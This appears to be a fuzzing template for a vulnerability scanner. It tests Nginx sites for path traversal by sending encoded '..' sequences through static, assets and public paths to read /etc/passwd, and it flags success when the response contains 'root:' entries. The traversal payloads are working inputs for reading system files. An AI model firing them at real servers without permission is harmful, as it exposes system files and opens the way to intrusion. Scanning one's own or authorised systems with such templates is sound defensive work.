id: nginx-traversal-path-01
type: fuzz
info:
  name: Nginx Traversal Unix
  risk: High

variables:
  - separate: |
      ..
      ..;
      ..%3B
  - file: |
      etc/passwd
      /etc/passwd

payloads:
  - '{{.separate}}{{.file}}'
  - '{{.separate}}/{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'

requests:
  - generators:
      - Path("{{.payload}}", "*")
      - Path("static{{.payload}}", "*")
      - Path("assets{{.payload}}", "*")
      - Path("public{{.payload}}", "*")
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", ":/bin/bash")
